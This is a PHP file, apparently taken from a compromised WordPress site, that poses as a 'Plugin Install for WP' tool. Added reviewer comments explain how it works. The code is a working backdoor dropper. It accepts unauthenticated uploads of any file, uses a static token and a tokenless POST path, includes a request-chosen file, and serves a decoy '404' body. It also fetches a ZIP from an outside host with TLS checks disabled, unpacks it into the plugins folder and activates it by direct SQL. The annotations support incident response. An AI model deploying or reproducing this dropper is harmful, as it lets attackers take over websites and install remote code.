Файловый менеджер - Редактировать - /home/benshehx/iconenergyug.com/wp-plugin-install.php
<?php
# Reviewer annotation (defensive analysis; the code itself is unchanged).
#
# The page titles itself "Plugin Install for WP", but nothing in this script checks a
# session, nonce, capability or any other WordPress authentication. It is a standalone
# dropper with four entry points, evaluated in this order:
#   1. u=ok in the query string  - writes an uploaded file into this script's directory.
#   2. API=<static token>        - JSON interface gated only by a fixed string.
#   3. any other POST request    - the same install flow as (2), with no token at all.
#   4. an `f` query parameter    - renders the HTML form; without it a decoy body is printed.
# Flows 2 and 3 download a ZIP from a request-supplied URL, unpack it into the plugins
# directory and append the plugin to the `active_plugins` option through the script's own
# PDO connection; no WordPress API call is visible in that path.
#
# Triage pointers taken from the code: the static token, the default download URL and the
# default plugin path below are fixed strings suitable for access-log and file-system
# searches. An unexpected `active_plugins` entry and a new directory under the plugins
# path are the persistent results of a successful run.

# All error output is disabled, so failures of this script leave nothing in the response.
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');

# Upload
# Entry point 1. The destination is this script's directory plus the client-supplied file
# name; no extension, MIME type or size check is made here, so a .php upload would become
# directly requestable. Three write methods are tried in turn, each with warnings
# suppressed by `@`. The branch always ends with exit, so nothing below runs for u=ok.
if (isset($_GET['u']) && $_GET['u'] == 'ok') {
    if (isset($_FILES['file'])) {
        $file = $_FILES['file'];
        if ($file['error'] == 0) {
            $path = __DIR__ . '/' . $file['name'];
            if (@move_uploaded_file($file['tmp_name'], $path)) {
                echo "File uploaded using move_uploaded_file: {$file['name']}";
            } else if (@rename($file['tmp_name'], $path)) {
                echo "File uploaded using rename: {$file['name']}";
            } else if (@file_put_contents($path, @file_get_contents($file['tmp_name']))) {
                echo "File uploaded using file_put_contents: {$file['name']}";
            } else {
                echo "File not uploaded!";
            }
        } else {
            echo "File not uploaded!";
        }
        echo "<br>";
        echo "<br>";
    }
    echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file"><button type="submit">Upload</button></form>';
    exit;
}

# Extensions
# Pre-flight check: stops unless zip, curl and pdo_mysql are all loaded. The message is
# Turkish for roughly "<EXT> is not installed, cannot continue".
$extensions = ['zip', 'curl', 'pdo_mysql'];
$error = 0;
foreach ($extensions as $ext) {
    if (!extension_loaded($ext)) {
        echo strtoupper($ext) . " yüklü değil, işlemlere devam edilemeyecek :(.<br>";
        $error++;
    }
}
if ($error > 0) {
    exit;
}

# Function - Download and Extract Plugin
# Downloads $url to a temporary .zip and extracts it into $destinationFolder.
# Returns true on success, otherwise an error string containing the temp file path.
#
# Points relevant to analysis:
#   - Both TLS checks (peer and host) are switched off and redirects are followed, so the
#     archive's origin is not authenticated in any way.
#   - extractTo() is called on the whole archive with no inspection of entry names or
#     types before files are written.
#   - tempnam() creates a file named with the `plugin_` prefix, but the script writes to
#     and later unlinks only that name with `.zip` appended; the un-suffixed file is never
#     removed here, so leftover `plugin_*` files in the temp directory are a likely
#     artifact of each run.
function download_and_extract_plugin($url, $destinationFolder)
{
    $tempZip = tempnam(sys_get_temp_dir(), 'plugin_') . '.zip';
    $ch = curl_init($url);
    $fp = fopen($tempZip, 'w');
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $success = curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    if (!$success) {
        unlink($tempZip);
        return "{$tempZip} - ZIP file not downloaded.";
    }
    $zip = new ZipArchive();
    if ($zip->open($tempZip) === true) {
        $zip->extractTo($destinationFolder);
        $zip->close();
        unlink($tempZip);
        return true;
    } else {
        unlink($tempZip);
        return "{$tempZip} - ZIP file not extracted.";
    }
}

# API
# Entry point 2. The only gate is equality with the static string below, which is the
# same in every copy of this file and therefore works as a search indicator.
if (isset($_GET['API']) && trim($_GET['API']) == 'LJz5ZtXGc7hSM4aUfmE9CH') {
    # Params
    # Every value can be overridden from the POST body (URL-decoded); the fallbacks are
    # paths relative to this script plus a hard-coded download URL and plugin entry file.
    $wp_config = isset($_POST['wp_config_file']) ? urldecode(trim($_POST['wp_config_file'])) : __DIR__ . '/wp-config.php';
    $destinationFolder = isset($_POST['wp_plugin_path']) ? urldecode(trim($_POST['wp_plugin_path'])) : __DIR__ . '/wp-content/plugins/';
    $plugin_path = isset($_POST['plugin_path_file']) ? urldecode(trim($_POST['plugin_path_file'])) : 'fancy-elementor-gallery-box/fancy-elementor-gallery-box.php';
    $url = isset($_POST['plugin_url']) ? urldecode(trim($_POST['plugin_url'])) : 'https://ampproject.com.tr/canonical_plugin_for_wp.zip?v='.time();

    # Install plugin
    # Without action=install the script only echoes the resolved parameters as JSON and
    # stops; that response discloses the absolute server paths derived from __DIR__.
    # $_GET['action'] is read without an isset() check.
    if (trim($_GET['action']) != 'install') {
        die(json_encode([
            "status" => true,
            "wp_config_file" => $wp_config,
            "wp_plugins_path" => $destinationFolder,
            "plugin_path_file" => $plugin_path,
            "plugin_url" => $url,
            #"action" => "install",
        ]));
    }

    # wp-config.php file check
    if (!file_exists($wp_config)) {
        die(json_encode(["status" => false, "error" => "{$wp_config} file not found."]));
    }

    # plugin path check
    if (!is_dir($destinationFolder)) {
        die(json_encode(["status" => false, "error" => "{$destinationFolder} folder not found."]));
    }

    # plugin file check
    # Refuses to run again once the plugin entry file exists, so a second request against
    # an already-modified site returns the "already installed" error.
    if (file_exists($destinationFolder . $plugin_path)) {
        die(json_encode(["status" => false, "error" => "{$destinationFolder}{$plugin_path} file already installed."]));
    }

    # wp-config.php file include
    # The included path is request-controlled: PHP executes whichever existing file it
    # names, not necessarily a WordPress config.
    include_once $wp_config;

    # wp-config.php file include
    # Duplicate of the statement above; include_once makes the second call a no-op.
    include_once $wp_config;

    # Database Connection
    # The DB_* constants are not defined in this file; presumably they come from the
    # included config - confirm against the site's wp-config.php.
    $servername = DB_HOST;
    $username = DB_USER;
    $password = DB_PASSWORD;
    $dbname = DB_NAME;
    $charset = DB_CHARSET;

    // Create connection pdo
    # On failure the PDO exception message is returned to the caller in the JSON body.
    try {
        $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password);
        $db->exec('SET NAMES `' . $charset . '`');
    } catch (PDOException $e) {
        die(json_encode(["status" => false, "error" => 'Connection failed: ' . $e->getMessage()]));
    }

    # Upload Plugin
    $upload_plugin = download_and_extract_plugin($url, $destinationFolder);
    if ($upload_plugin !== true) {
        die(json_encode(["status" => false, "error" => $upload_plugin]));
    }

    # options - active plugins
    # Reads the serialized `active_plugins` option, appends $plugin_path and writes it
    # back. $table_prefix is not assigned in this file (presumably set by the included
    # config - confirm). The UPDATE interpolates the serialized value, which contains the
    # request-supplied $plugin_path, straight into the SQL text with no escaping or
    # prepared statement. For incident review, compare the current option value with a
    # known-good backup.
    $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch();
    $active_plugins = unserialize($active_plugins['option_value']);
    if (is_array($active_plugins)) {
        if (!in_array($plugin_path, $active_plugins)) {
            $active_plugins[] = $plugin_path;
            $active_plugins = serialize($active_plugins);
            $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';");
            die(json_encode(["status" => true, "message" => "{$plugin_path} - Plugin activated!"]));
        } else {
            die(json_encode(["status" => false, "error" => "Plugin already activated!"]));
        }
    } else {
        die(json_encode(["status" => false, "error" => "Error! - active_plugins not found"]));
    }
    exit;
}

# POST REQUEST
# Entry point 3. Reached by any POST that did not match the two branches above; there is
# no token check on this path. It repeats the API flow with plain-text responses, and the
# four POST fields are read without isset() checks or fallbacks.
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    # Post params
    $wp_config = trim($_POST['wp_config_file']);
    $destinationFolder = trim($_POST['wp_plugin_path']);
    $plugin_path = trim($_POST['plugin_path_file']);
    $url = trim($_POST['plugin_url']);

    # wp-config.php file check
    if (!file_exists($wp_config)) {
        die("{$wp_config} file not found.");
    }

    # plugin path check
    if (!is_dir($destinationFolder)) {
        die("{$destinationFolder} folder not found.");
    }

    # plugin file check
    if (file_exists($destinationFolder . $plugin_path)) {
        die("{$destinationFolder}{$plugin_path} file already installed.");
    }

    # wp-config.php file include
    # Request-controlled include path, as in the API branch.
    include_once $wp_config;

    # Database Connection
    # DB_* constants are presumably defined by the included file - confirm.
    $servername = DB_HOST;
    $username = DB_USER;
    $password = DB_PASSWORD;
    $dbname = DB_NAME;
    $charset = DB_CHARSET;

    // Create connection pdo
    try {
        $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password);
        $db->exec('SET NAMES `' . $charset . '`');
    } catch (PDOException $e) {
        die('Connection failed: ' . $e->getMessage());
    }

    # Upload Plugin
    # $url is echoed into the HTML response without escaping.
    $upload_plugin = download_and_extract_plugin($url, $destinationFolder);
    if ($upload_plugin === true) {
        echo "Plugin ($url) downloaded and will be active...<br>";
    } else {
        die($upload_plugin);
    }

    # options - active plugins
    # Same direct read-modify-write of `active_plugins` as in the API branch, with the
    # same unescaped interpolation into the UPDATE statement.
    $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch();
    $active_plugins = unserialize($active_plugins['option_value']);
    if (is_array($active_plugins)) {
        if (!in_array($plugin_path, $active_plugins)) {
            $active_plugins[] = $plugin_path;
            $active_plugins = serialize($active_plugins);
            $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';");
            die("{$plugin_path} - Plugin activated!");
        } else {
            die("Plugin already activated!");
        }
    } else {
        die("Error! - active_plugins not found");
    }
    exit;
}

# GET REQUEST
# Entry point 4. Because the two tests are joined with &&, this branch is taken only when
# `f` is absent; a request carrying `f` with any value falls through to the form below.
# The text "404 Not Found" is only a response body - no status code is set in this file,
# so the decoy likely returns HTTP 200, which distinguishes it from the server's real 404
# page in access logs.
if (!isset($_GET['f']) && $_GET['f'] != 'ok') {
    die("404 Not Found");
}
# The form below posts to the same URL (entry point 3) and pre-fills the absolute paths
# of this directory together with the default download URL and plugin entry file.
?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Plugin Install for WP</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> </head> <body> <div class="container mt-5"> <h1 class="text-center mb-4">Plugin Install for WP</h1> <p> </p> <div class="row justify-content-center"> <div class="col-md-6"> <form method="post" action=""> <h2>Local Settings</h2> <div class="mb-3"> <label for="name" class="form-label">WP Config Path</label> <input type="text" class="form-control" name="wp_config_file" placeholder="<?php echo __DIR__ ?>/wp-config.php" value="<?php echo __DIR__ ?>/wp-config.php"> </div> <div class="mb-3"> <label for="name" class="form-label">WP Plugin Path</label> <input type="text" class="form-control" name="wp_plugin_path" placeholder="<?php echo __DIR__ ?>/wp-content/plugins/" value="<?php echo __DIR__ ?>/wp-content/plugins/"> </div> <p> </p> <h2>Remote Plugin Settings</h2> <div class="mb-3"> <label for="name" class="form-label">Plugin URL</label> <input type="text" class="form-control" name="plugin_url" placeholder="https://site.com/plugin.zip" value="https://ampproject.com.tr/canonical_plugin_for_wp.zip?v=<?php echo time() ?>"> </div> <div class="mb-3"> <label for="name" class="form-label">Plugin Path File</label> <input type="text" class="form-control" name="plugin_path_file" placeholder="plugin_path/plugin_root_file.php" value="fancy-elementor-gallery-box/fancy-elementor-gallery-box.php"> </div> <button type="submit" class="btn btn-danger w-100">Do Install Plugin, Dude!</button> </form> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </body> </html>